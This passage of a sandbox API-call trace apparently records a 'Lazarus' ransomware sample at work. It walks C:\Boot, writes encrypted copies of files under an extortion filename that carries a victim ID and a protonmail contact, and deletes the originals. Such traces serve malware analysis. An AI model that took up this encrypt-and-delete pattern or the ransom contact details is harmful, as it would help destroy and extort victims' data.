dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.379] AreFileApisANSI () returned 1 [0082.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0082.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x22) returned 0x7a7b8 [0082.380] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x7a7b8, cchWideChar=17 | out: lpWideCharStr="C:\\Boot\\BCD.LOG2") returned 17 [0082.380] GetFileAttributesExW (in: lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc4c800b6, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4c800b6, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4c800b6, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0082.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a7b8 | out: hHeap=0x20000) returned 1 [0082.380] AreFileApisANSI () returned 1 [0082.380] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0082.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0082.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.380] GetLastError () returned 0x0 [0082.380] SetLastError (dwErrCode=0x0) [0082.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4dea8 [0082.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0082.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bd10 [0082.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0082.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0082.380] GetLastError () returned 0x0 [0082.380] SetLastError (dwErrCode=0x0) [0082.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0082.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0082.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0082.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0082.380] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0082.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0082.381] AreFileApisANSI () returned 1 [0082.381] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0082.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x2e430 [0082.381] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=79 | out: lpWideCharStr="C:\\Boot\\BCD.LOG2.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 79 [0082.381] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\boot\\bcd.log2.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x334 [0082.559] GetFileType (hFile=0x334) returned 0x1 [0082.559] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0082.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0082.559] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0082.566] AreFileApisANSI () returned 1 [0082.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0082.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x22) returned 0x7a7b8 [0082.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x7a7b8, cchWideChar=17 | out: lpWideCharStr="C:\\Boot\\BCD.LOG2") returned 17 [0082.566] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.566] GetFileType (hFile=0x430) returned 0x1 [0082.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a7b8 | out: hHeap=0x20000) returned 1 [0082.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0082.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.566] GetLastError () returned 0x0 [0082.566] SetLastError (dwErrCode=0x0) [0082.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.566] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.566] GetLastError () returned 0x0 [0082.566] SetLastError (dwErrCode=0x0) [0082.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0082.567] ReadFile (in: hFile=0x430, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f030*=0x0, lpOverlapped=0x0) returned 1 [0082.567] GetLastError () returned 0x0 [0082.567] SetLastError (dwErrCode=0x0) [0082.567] GetLastError () returned 0x0 [0082.567] SetLastError (dwErrCode=0x0) [0082.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0082.567] CloseHandle (hObject=0x334) returned 1 [0082.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0082.567] CloseHandle (hObject=0x430) returned 1 [0082.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0082.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0082.568] AreFileApisANSI () returned 1 [0082.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0082.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x22) returned 0x7a908 [0082.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x7a908, cchWideChar=17 | out: lpWideCharStr="C:\\Boot\\BCD.LOG2") returned 17 [0082.568] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.568] GetLastError () returned 0x5 [0082.568] GetLastError () returned 0x5 [0082.568] SetLastError (dwErrCode=0x5) [0082.568] GetLastError () returned 0x5 [0082.568] SetLastError (dwErrCode=0x5) [0082.568] GetLastError () returned 0x5 [0082.568] SetLastError (dwErrCode=0x5) [0082.568] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7a908 | out: hHeap=0x20000) returned 1 [0082.568] GetLastError () returned 0x5 [0082.568] SetLastError (dwErrCode=0x5) [0082.568] AreFileApisANSI () returned 1 [0082.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0082.568] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x22) returned 0x7ab18 [0082.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x7ab18, cchWideChar=17 | out: lpWideCharStr="C:\\Boot\\BCD.LOG2") returned 17 [0082.568] DeleteFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2")) returned 1 [0082.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7ab18 | out: hHeap=0x20000) returned 1 [0082.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0082.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0082.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0082.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0082.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0082.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0082.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0082.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0082.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0082.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bd10 | out: hHeap=0x20000) returned 1 [0082.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0082.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0082.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.569] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.569] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.569] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc47bb525, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x0, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0082.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0082.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0082.569] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.569] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.570] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.570] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.570] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.570] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.570] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.570] AreFileApisANSI () returned 1 [0082.570] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\bg-BG", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\bg-BG", lpUsedDefaultChar=0x0) returned 14 [0082.570] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.570] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0082.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0082.570] AreFileApisANSI () returned 1 [0082.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0082.570] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x883b0 [0082.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x883b0, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\bg-BG") returned 14 [0082.571] CreateFileW (lpFileName="C:\\Boot\\bg-BG" (normalized: "c:\\boot\\bg-bg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.571] GetLastError () returned 0x5 [0082.571] GetLastError () returned 0x5 [0082.571] SetLastError (dwErrCode=0x5) [0082.571] GetLastError () returned 0x5 [0082.571] SetLastError (dwErrCode=0x5) [0082.571] GetLastError () returned 0x5 [0082.571] SetLastError (dwErrCode=0x5) [0082.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.571] AreFileApisANSI () returned 1 [0082.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0082.571] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0082.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\bg-BG") returned 14 [0082.571] CreateFileW (lpFileName="C:\\Boot\\bg-BG" (normalized: "c:\\boot\\bg-bg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.571] GetLastError () returned 0x5 [0082.571] GetLastError () returned 0x5 [0082.571] SetLastError (dwErrCode=0x5) [0082.571] GetLastError () returned 0x5 [0082.571] SetLastError (dwErrCode=0x5) [0082.571] GetLastError () returned 0x5 [0082.571] SetLastError (dwErrCode=0x5) [0082.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0082.571] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0082.571] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.572] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.572] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.572] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.572] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef4e6d79, ftCreationTime.dwHighDateTime=0x1d3273d, ftLastAccessTime.dwLowDateTime=0xef4e6d79, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x175a0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="bootspaces.dll", cAlternateFileName="BOOTSP~1.DLL")) returned 1 [0082.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0082.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0082.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0082.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.572] FindFirstFileExW (in: lpFileName="C:\\Boot\\bg-BG\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78f10 [0082.572] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc47bb525, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.572] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0082.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46978 [0082.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0082.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0082.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0082.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0082.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0082.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0082.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.573] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0082.573] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0082.573] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, 